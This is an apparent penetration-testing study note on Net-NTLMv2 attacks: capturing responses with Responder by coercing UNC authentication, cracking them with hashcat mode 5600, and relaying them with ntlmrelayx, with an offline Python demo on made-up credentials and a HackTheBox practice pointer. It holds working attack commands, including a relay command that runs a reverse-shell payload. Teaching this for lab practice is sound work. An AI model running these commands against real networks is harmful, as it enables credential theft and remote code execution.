Net-NTLMv2

Two Different Things, One Name

This is the single biggest point of confusion in Windows credential attacks, so let’s kill it up front.

There are two completely different things both called “NTLM”:


                       NTLM hash                        Net-NTLMv2 hash
  What it is           A hash of the password           A response in a network login
  Where it lives       Stored at rest (SAM, LSASS)      Generated on the fly, stored nowhere
  Does it change?      Static, same every time          Different every time (tied to a random challenge)
  What you do with it  Crack it, or pass it             Crack it, or relay it, never pass it

They sound identical and behave nothing alike. The previous note was about the stored hash. This note is about the network one. Keep them separate and everything else clicks.


The Unprivileged Scenario

Pass-the-Hash needed local admin (elevated to SYSTEM) to read the SAM. Here you have neither: just a foothold as a low-privileged user. No Mimikatz, no SAM.

But you can still make a Windows machine authenticate to you, and capture the network response it produces.


How the Capture Works

Windows network authentication is a challenge-response:

  1. The client says “I want to connect”
  2. The server sends a random 8-byte challenge (a nonce)
  3. The client computes a keyed hash (HMAC-MD5, keyed from its NTLM hash) over that challenge plus its own nonce and timestamp → the Net-NTLMv2 response
  4. The server recomputes the same value from the hash it holds and compares

If you are the server, you chose the challenge, and step 3 lands in your lap.


The tool is Responder. It runs rogue authentication servers (SMB, HTTP and others) that log these responses, and it also poisons LLMNR/NBT-NS/mDNS name lookups; here we just need it listening:

sudo responder -I eth0

Then you coerce the victim into authenticating to you. From a shell on the victim, simply reach for a share on your box (10.10.10.5 here):

dir \\10.10.10.5\share

Windows tries to connect and authenticates on the way, handing Responder a Net-NTLMv2 hash (printed on screen and written under its logs/ directory). No shell? Any feature that will fetch a UNC path works too, e.g. a web form that accepts \\10.10.10.5\x.


Why You Can’t Pass This One

A Net-NTLMv2 response is the answer to one specific random challenge (it also binds the client’s own nonce and timestamp). Replay it against a different server and that server’s challenge won’t match, so the response is worthless. That’s why there’s no “pass-the-Net-NTLMv2-hash”. The static NTLM hash you can pass; this one-time response you cannot.


Two Options: Crack or Relay

Since you can’t pass it, a captured Net-NTLMv2 hash leaves you exactly two moves.


Crack It

If the password might be weak, throw it at Hashcat, mode 5600:

hashcat -m 5600 captured.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Crack it, and now you have a plaintext password to reuse anywhere.


Relay It

But what if the password is long and random? You’ll never crack it. So don’t try. Forward it instead.


The insight: a response is only valid for one challenge-response exchange, so don’t save it for later, pass it along live to a different machine as it happens:

  1. You coerce the victim to authenticate to you
  2. At the same instant, you open a connection to a second machine (the real target)
  3. The second machine sends its challenge, you forward it to the victim
  4. The victim’s valid response comes back, you forward it to the second machine
  5. The second machine sees a legitimate login, as the victim

You’re a man-in-the-middle on the authentication itself. The tool is ntlmrelayx:

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.20 -c "<base64 reverse shell>"

If the victim is a local admin on that second machine, the relayed login gives you code execution there.

Three caveats, all properties of the protocol rather than tool quirks. The target must not require SMB signing: a signed session needs the session key, which is derived from the NTLM hash the relay never has; domain controllers require signing by default, workstations and most member servers do not. You cannot relay a machine’s authentication back to that same machine; that was closed with MS08-068. And Responder’s own SMB server must be switched off in Responder.conf before you start ntlmrelayx, or the two tools fight over port 445.

Crack for a weak password, relay for a strong one. And the same UAC remote restriction caveat from Pass-the-Hash applies: for code execution, the relayed user generally needs to be the built-in Administrator unless remote restrictions are off (LocalAccountTokenFilterPolicy = 1).
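As an added example (not code from this page, Responder or ntlmrelayx), here is the whole exchange from “How the Capture Works” in pure Python: the client’s step 3, the line Responder prints for hashcat -m 5600, the server’s step 4 check, the wordlist crack from “Crack It”, and the relay trick. The user, domain, password, target nonce, timestamp and AV pairs are constructed; the attacker nonce 1122334455667788 is Responder’s default challenge.

```python
# Added example, not Responder/ntlmrelayx code: Net-NTLMv2 end to end, offline.
# Sample user, domain, password, nonces and target info are made up.
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib.new('md4') may be unavailable under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, s): return ((x << s) | (x >> (32 - s))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, rol((a + func(b, c, d) + x[idx] + k) & MASK, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The stored, static NTLM hash: unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def nt_proof(nthash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """Step 3. NTLMv2 is a keyed hash, not encryption:
    key = HMAC-MD5(NT hash, UPPER(user) + domain); NTProofStr = HMAC-MD5(key, challenge + blob).
    On the wire the NtChallengeResponse is NTProofStr followed by the blob."""
    key = hmac.new(nthash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def make_blob(timestamp: bytes, client_nonce: bytes, target_info: bytes) -> bytes:
    """The client blob ('temp' in MS-NLMP): type bytes 0x01 0x01, reserved, FILETIME,
    8-byte client nonce, reserved, AV_PAIR target info, reserved."""
    return b"\x01\x01" + b"\x00" * 6 + timestamp + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4


def hashcat_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The line Responder writes: USER::DOMAIN:serverchallenge:NTProofStr:blob."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def server_accepts(stored_nthash: bytes, user: str, domain: str, challenge: bytes, proof: bytes, blob: bytes) -> bool:
    """Step 4: the server recomputes the proof from the hash it holds and the challenge
    IT issued. A proof computed for any other challenge fails here, hence no pass-the-response."""
    return hmac.compare_digest(nt_proof(stored_nthash, user, domain, challenge, blob), proof)


def crack_5600(line: str, wordlist):
    """What hashcat -m 5600 does: recompute the proof per candidate and compare."""
    user, _, domain, chal, proof, blob = line.split(":")
    for candidate in wordlist:
        guess = nt_proof(nt_hash(candidate), user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
        if hmac.compare_digest(guess, bytes.fromhex(proof)):
            return candidate
    return None


# Constructed sample: a low-priv victim, our Responder listener, and a real target.
USER, DOMAIN, PASSWORD = "jsmith", "WORKGROUP", "Summer2023!"
ATTACKER_CHALLENGE = bytes.fromhex("1122334455667788")   # Responder's default challenge
TARGET_CHALLENGE = bytes.fromhex("a1b2c3d4e5f60718")     # made-up nonce from the real target
BLOB = make_blob(
    struct.pack("<Q", 133_000_000_000_000_000),          # made-up FILETIME
    bytes.fromhex("0f0e0d0c0b0a0908"),                   # made-up client nonce
    struct.pack("<HH", 1, 12) + "VICTIM".encode("utf-16le") + struct.pack("<HH", 0, 0),  # MsvAvNbComputerName, MsvAvEOL
)

if __name__ == "__main__":
    # 1. Victim reaches \\attacker\share; Responder issues its challenge, the victim answers.
    captured = nt_proof(nt_hash(PASSWORD), USER, DOMAIN, ATTACKER_CHALLENGE, BLOB)
    line = hashcat_5600(USER, DOMAIN, ATTACKER_CHALLENGE, captured, BLOB)
    print("captured:", line)
    # 2. Crack: a weak password falls to a wordlist.
    print("cracked:", crack_5600(line, ["123456", "Password1", "Summer2023!"]))
    # 3. Pass it? The target issued a different nonce, so the captured proof is rejected.
    stored = nt_hash(PASSWORD)                            # what the target holds for jsmith
    print("replay accepted:", server_accepts(stored, USER, DOMAIN, TARGET_CHALLENGE, captured, BLOB))
    # 4. Relay: hand the TARGET's nonce to the victim while it is still talking to us,
    #    then forward the victim's answer to the target unchanged.
    relayed = nt_proof(nt_hash(PASSWORD), USER, DOMAIN, TARGET_CHALLENGE, BLOB)  # the victim's side
    print("relay accepted:", server_accepts(stored, USER, DOMAIN, TARGET_CHALLENGE, relayed, BLOB))
```

Running it prints the captured 5600 line, the recovered password, replay accepted: False and relay accepted: True. The only thing the relay contributes is swapping in the target's nonce at step 2 of the exchange; it never learns the hash, which is also why it cannot produce a signed SMB session.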


Local, Network… What About Domain?

You can now attack the stored local hash (Pass-the-Hash) and the network hash (capture, crack, relay). Both have been about local accounts.

But enterprises run on domain accounts, and those hashes live somewhere else entirely: in memory. They’re easy to grab… until Microsoft’s newest defense gets in the way. That’s the final note.


Practice Boxes

  • Responder - HackTheBox Starting Point (Tier 1). Coerce a victim into authenticating to Responder, capture the Net-NTLMv2 hash, crack it, and log in. This note start to finish.